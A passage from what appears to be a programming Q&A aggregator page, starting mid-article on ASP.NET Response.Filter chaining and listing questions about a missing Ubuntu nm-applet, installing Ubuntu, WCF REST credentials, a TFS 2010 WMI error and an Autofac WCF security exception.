performance in general as it adds another layer of indirection to the ASP.NET output pipeline, and this implementation in particular adds a memory hit as it basically duplicates the response output into the cached memory stream which is necessary since you may have to look at the entire response. If you have large pages in particular this can cause potentially serious memory pressure in your server application. So be careful of wholesale adoption of this (or other) Response.Filters. Make sure to do some performance testing to ensure it’s not killing your app’s performance. Response.Filter works everywhere A few questions came up in comments and discussion as to capturing ALL output hitting the site and – yes you can definitely do that by assigning a Response.Filter inside of a module. If you do this however you’ll want to be very careful and decide which content you actually want to capture especially in IIS 7 which passes ALL content – including static images/CSS etc. through the ASP.NET pipeline. So it is important to filter only on what you’re looking for – like the page extension or maybe more effectively the Response.ContentType. Response.Filter Chaining Originally I thought that filter chaining doesn’t work at all due to a bug in the stream implementation code. But it’s quite possible to assign multiple filters to the Response.Filter property. So the following actually works to both compress the output and apply the transformed content: WebUtils.GZipEncodePage(); ResponseFilterStream filter = new ResponseFilterStream(Response.Filter); filter.TransformString += filter_TransformString; Response.Filter = filter; However the following does not work resulting in invalid content encoding errors: ResponseFilterStream filter = new ResponseFilterStream(Response.Filter); filter.TransformString += filter_TransformString; Response.Filter = filter; WebUtils.GZipEncodePage(); In other words multiple Response filters can work together but it depends entirely on the implementation whether they can be chained or in which order they can be chained. In this case running the GZip/Deflate stream filters apparently relies on the original content length of the output and chokes when the content is modified. But if attaching the compression first it works fine as unintuitive as that may seem. Resources Download example code Capture Output from ASP.NET Pages © Rick Strahl, West Wind Technologies, 2005-2010Posted in ASP.NET  

    Read the article

  • nm-applet gone?

    - by welp
    nm-applet seems to have disappeared from my system. I am running 12.10. Here's what I get when I check my package manager logs: ? ~ grep network-manager /var/log/dpkg.log 2012-10-06 10:37:08 upgrade network-manager-gnome:amd64 0.9.6.2-0ubuntu5 0.9.6.2-0ubuntu6 2012-10-06 10:37:08 status half-configured network-manager-gnome:amd64 0.9.6.2-0ubuntu5 2012-10-06 10:37:08 status unpacked network-manager-gnome:amd64 0.9.6.2-0ubuntu5 2012-10-06 10:37:08 status half-installed network-manager-gnome:amd64 0.9.6.2-0ubuntu5 2012-10-06 10:37:08 status half-installed network-manager-gnome:amd64 0.9.6.2-0ubuntu5 2012-10-06 10:37:08 status half-installed network-manager-gnome:amd64 0.9.6.2-0ubuntu5 2012-10-06 10:37:08 status half-installed network-manager-gnome:amd64 0.9.6.2-0ubuntu5 2012-10-06 10:37:08 status half-installed network-manager-gnome:amd64 0.9.6.2-0ubuntu5 2012-10-06 10:37:08 status half-installed network-manager-gnome:amd64 0.9.6.2-0ubuntu5 2012-10-06 10:37:08 status half-installed network-manager-gnome:amd64 0.9.6.2-0ubuntu5 2012-10-06 10:37:09 status half-installed network-manager-gnome:amd64 0.9.6.2-0ubuntu5 2012-10-06 10:37:09 status unpacked network-manager-gnome:amd64 0.9.6.2-0ubuntu6 2012-10-06 10:37:09 status unpacked network-manager-gnome:amd64 0.9.6.2-0ubuntu6 2012-10-06 10:39:50 configure network-manager-gnome:amd64 0.9.6.2-0ubuntu6 2012-10-06 10:39:50 status unpacked network-manager-gnome:amd64 0.9.6.2-0ubuntu6 2012-10-06 10:39:50 status unpacked network-manager-gnome:amd64 0.9.6.2-0ubuntu6 2012-10-06 10:39:50 status half-configured network-manager-gnome:amd64 0.9.6.2-0ubuntu6 2012-10-06 10:39:50 status installed network-manager-gnome:amd64 0.9.6.2-0ubuntu6 2012-10-28 22:27:23 status installed network-manager-gnome:amd64 0.9.6.2-0ubuntu6 2012-10-28 22:27:23 remove network-manager-gnome:amd64 0.9.6.2-0ubuntu6 2012-10-28 22:27:23 status half-configured network-manager-gnome:amd64 0.9.6.2-0ubuntu6 2012-10-28 22:27:23 status half-installed network-manager-gnome:amd64 0.9.6.2-0ubuntu6 2012-10-28 22:27:23 status half-installed network-manager-gnome:amd64 0.9.6.2-0ubuntu6 2012-10-28 22:27:23 status half-installed network-manager-gnome:amd64 0.9.6.2-0ubuntu6 2012-10-28 22:27:23 status half-installed network-manager-gnome:amd64 0.9.6.2-0ubuntu6 2012-10-28 22:27:23 status half-installed network-manager-gnome:amd64 0.9.6.2-0ubuntu6 2012-10-28 22:27:23 status half-installed network-manager-gnome:amd64 0.9.6.2-0ubuntu6 2012-10-28 22:27:23 status half-installed network-manager-gnome:amd64 0.9.6.2-0ubuntu6 2012-10-28 22:27:23 status half-installed network-manager-gnome:amd64 0.9.6.2-0ubuntu6 2012-10-28 22:27:23 status config-files network-manager-gnome:amd64 0.9.6.2-0ubuntu6 2012-10-28 22:27:23 status config-files network-manager-gnome:amd64 0.9.6.2-0ubuntu6 2012-10-31 19:58:03 install network-manager-gnome:amd64 0.9.6.2-0ubuntu6 0.9.6.2-0ubuntu6 2012-10-31 19:58:03 status half-installed network-manager-gnome:amd64 0.9.6.2-0ubuntu6 2012-10-31 19:58:03 status half-installed network-manager-gnome:amd64 0.9.6.2-0ubuntu6 2012-10-31 19:58:03 status half-installed network-manager-gnome:amd64 0.9.6.2-0ubuntu6 2012-10-31 19:58:03 status half-installed network-manager-gnome:amd64 0.9.6.2-0ubuntu6 2012-10-31 19:58:03 status half-installed network-manager-gnome:amd64 0.9.6.2-0ubuntu6 2012-10-31 19:58:03 status half-installed network-manager-gnome:amd64 0.9.6.2-0ubuntu6 2012-10-31 19:58:03 status half-installed network-manager-gnome:amd64 0.9.6.2-0ubuntu6 2012-10-31 19:58:03 status half-installed network-manager-gnome:amd64 0.9.6.2-0ubuntu6 2012-10-31 19:58:03 status unpacked network-manager-gnome:amd64 0.9.6.2-0ubuntu6 2012-10-31 19:58:03 status unpacked network-manager-gnome:amd64 0.9.6.2-0ubuntu6 2012-10-31 19:58:06 configure network-manager-gnome:amd64 0.9.6.2-0ubuntu6 2012-10-31 19:58:06 status unpacked network-manager-gnome:amd64 0.9.6.2-0ubuntu6 2012-10-31 19:58:07 status unpacked network-manager-gnome:amd64 0.9.6.2-0ubuntu6 2012-10-31 19:58:07 status half-configured network-manager-gnome:amd64 0.9.6.2-0ubuntu6 2012-10-31 19:58:07 status installed network-manager-gnome:amd64 0.9.6.2-0ubuntu6 ? ~ Unfortunately, I cannot find network-manager-applet package at all: ? ~ apt-cache search network-manager-applet ? ~ Here are the contents of /etc/apt/sources.list: ? ~ cat /etc/apt/sources.list # deb cdrom:[Ubuntu 12.04 LTS _Precise Pangolin_ - Release amd64 (20120425)]/ dists/precise/main/binary-i386/ # deb cdrom:[Ubuntu 12.04 LTS _Precise Pangolin_ - Release amd64 (20120425)]/ dists/precise/restricted/binary-i386/ # deb cdrom:[Ubuntu 12.04 LTS _Precise Pangolin_ - Release amd64 (20120425)]/ precise main restricted # See http://help.ubuntu.com/community/UpgradeNotes for how to upgrade to # newer versions of the distribution. deb http://gb.archive.ubuntu.com/ubuntu/ quantal main restricted deb-src http://gb.archive.ubuntu.com/ubuntu/ quantal main restricted ## Major bug fix updates produced after the final release of the ## distribution. deb http://gb.archive.ubuntu.com/ubuntu/ quantal-updates main restricted deb-src http://gb.archive.ubuntu.com/ubuntu/ quantal-updates main restricted ## N.B. software from this repository is ENTIRELY UNSUPPORTED by the Ubuntu ## team. Also, please note that software in universe WILL NOT receive any ## review or updates from the Ubuntu security team. deb http://gb.archive.ubuntu.com/ubuntu/ quantal universe deb-src http://gb.archive.ubuntu.com/ubuntu/ quantal universe deb http://gb.archive.ubuntu.com/ubuntu/ quantal-updates universe deb-src http://gb.archive.ubuntu.com/ubuntu/ quantal-updates universe ## N.B. software from this repository is ENTIRELY UNSUPPORTED by the Ubuntu ## team, and may not be under a free licence. Please satisfy yourself as to ## your rights to use the software. Also, please note that software in ## multiverse WILL NOT receive any review or updates from the Ubuntu ## security team. deb http://gb.archive.ubuntu.com/ubuntu/ quantal multiverse deb-src http://gb.archive.ubuntu.com/ubuntu/ quantal multiverse deb http://gb.archive.ubuntu.com/ubuntu/ quantal-updates multiverse deb-src http://gb.archive.ubuntu.com/ubuntu/ quantal-updates multiverse ## N.B. software from this repository may not have been tested as ## extensively as that contained in the main release, although it includes ## newer versions of some applications which may provide useful features. ## Also, please note that software in backports WILL NOT receive any review ## or updates from the Ubuntu security team. deb http://gb.archive.ubuntu.com/ubuntu/ quantal-backports main restricted universe multiverse deb-src http://gb.archive.ubuntu.com/ubuntu/ quantal-backports main restricted universe multiverse deb http://security.ubuntu.com/ubuntu quantal-security main restricted deb-src http://security.ubuntu.com/ubuntu quantal-security main restricted deb http://security.ubuntu.com/ubuntu quantal-security universe deb-src http://security.ubuntu.com/ubuntu quantal-security universe deb http://security.ubuntu.com/ubuntu quantal-security multiverse deb-src http://security.ubuntu.com/ubuntu quantal-security multiverse ## Uncomment the following two lines to add software from Canonical's ## 'partner' repository. ## This software is not part of Ubuntu, but is offered by Canonical and the ## respective vendors as a service to Ubuntu users. # deb http://archive.canonical.com/ubuntu precise partner # deb-src http://archive.canonical.com/ubuntu precise partner ## This software is not part of Ubuntu, but is offered by third-party ## developers who want to ship their latest software. deb http://extras.ubuntu.com/ubuntu quantal main deb-src http://extras.ubuntu.com/ubuntu quantal main ? ~ Right now, I can't think of anything else. Happy to provide more info upon request.

    Read the article

  • Please help me in installing Ubuntu 12.04.1. and Can it run MS Off. Prof. Plus 2007?

    - by ramandeep
    I want to install Ubuntu with MS Office Professional Plus 2007 running. I want to format my hard drive with slow speed as it happens when we install xp. The all cleaning with no traces left. For that what'll be easy to do: 1) Formatting entire hard drive OR 2) Formatting only that partition on which I want to install Ubuntu? I should be sure that I can run MS Office Professional Plus 2007 on Ubuntu. I have ubuntu-12.04.1-desktop-i386.iso burned on a CD and have MS Office Prof. Plus 2007 in this form - http://i.imgur.com/qAhP8.jpg I also want to know when I update Ubuntu how much MB will it be?

    Read the article

  • How do you pass user credentials from WebClient to a WCF REST service?

    - by Alex
    I am trying to expose a WCT REST service and only users with valid username and password would be able to access it. The username and password are stored in a SQL database. Here is the service contract: public interface IDataService { [OperationContract] [WebGet(ResponseFormat = WebMessageFormat.Json)] byte[] GetData(double startTime, double endTime); } Here is the WCF configuration: <bindings> <webHttpBinding> <binding name="SecureBinding"> <security mode="Transport"> <transport clientCredentialType="Basic"/> </security> </binding> </webHttpBinding> </bindings> <behaviors> <serviceBehaviors> <behavior name="DataServiceBehavior"> <serviceMetadata httpGetEnabled="true"/> <serviceCredentials> <userNameAuthentication userNamePasswordValidationMode="Custom" customUserNamePasswordValidatorType= "CustomValidator, WCFHost" /> </serviceCredentials> </behavior> </serviceBehaviors> </behaviors> <services> <service behaviorConfiguration="DataServiceBehavior" name="DataService"> <endpoint address="" binding="webHttpBinding" bindingConfiguration="SecureBinding" contract="IDataService" /> </service> </services> I am accessing the service via the WebClient class within a Silverlight application. However, I have not been able to figure out how to pass the user credentials to the service. I tried various values for client.Credentials but none of them seems to trigger the code in my custom validator. I am getting the following error: The underlying connection was closed: An unexpected error occurred on a send. Here is some sample code I have tried: WebClient client = new WebClient(); client.Credentials = new NetworkCredential("name", "password", "domain"); client.OpenReadCompleted += new OpenReadCompletedEventHandler(GetData); client.OpenReadAsync(new Uri(uriString)); If I set the security mode to None, the whole thing works. I also tried other clientCredentialType values and none of them worked. I also self-hosted the WCF service to eliminate the issues related to IIS trying to authenticate a user before the service gets a chance. Any comment on what the underlying issues may be would be much appreciated. Thanks. Update: Thanks to Mehmet's excellent suggestions. Here is the tracing configuration I had: <system.diagnostics> <sources> <source name="System.ServiceModel" switchValue="Information, ActivityTracing" propagateActivity="true"> <listeners> <add name="xml" /> </listeners> </source> <source name="System.IdentityModel" switchValue="Information, ActivityTracing" propagateActivity="true"> <listeners> <add name="xml" /> </listeners> </source> </sources> <sharedListeners> <add name="xml" type="System.Diagnostics.XmlWriterTraceListener" initializeData="c:\Traces.svclog" /> </sharedListeners> </system.diagnostics> But I did not see any message coming from my Silverlight client. As for https vs http, I used https as follows: string baseAddress = "https://localhost:6600/"; _webServiceHost = new WebServiceHost(typeof(DataServices), new Uri(baseAddress)); _webServiceHost.Open(); However, I did not configure any SSL certificate. Is this the problem?

    Read the article

  • WMI Security error TF255437 when installing TFS 2010 RC

    - by Daniel O
    Does anyone know the resolution to the following error. In this scenario, TFS will be using a local report server instance which points uses a separate SQL Server database engine instance. An error occurred while querying the Windows Management Instrumentation (WMI) interface on the following computer databaseServer. The following error message was received: Access is denied. (Exception from HRESULT: 0x80070005 (E_ACCESSDENIED)).

    Read the article

  • Autofac Wcf Integration Security Problem

    - by ecoffey
    I've created a Wcf Service to back a Ajax page (.Net 3.5). It's hosted in IIS 6.1 Integrated Pipeline. (The rest of Autofac is setup correctly for Web Forms integration). Everything works fine and dandy with the normal Wcf pipeline. However when I plug in the Autofac Wcf Integration (as per the Autofac wiki) I get this delightful exception: [SecurityException: That assembly does not allow partially trusted callers.] Autofac.Integration.Wcf.AutofacHostFactory.CreateServiceHost(String constructorString, Uri[] baseAddresses) in c:\Working\Autofac\src\Source\Autofac.Integration.Wcf\AutofacHostFactory.cs:78 System.ServiceModel.HostingManager.CreateService(String normalizedVirtualPath) +604 System.ServiceModel.HostingManager.ActivateService(String normalizedVirtualPath) +46 System.ServiceModel.HostingManager.EnsureServiceAvailable(String normalizedVirtualPath) +654 My Google-fu has failed me on finding a solution to this problem. Any insights or workarounds would be appreciated.

    Read the article

< Previous Page | 154 155 156 157 158 159 160 161 162 163 164 165  | Next Page >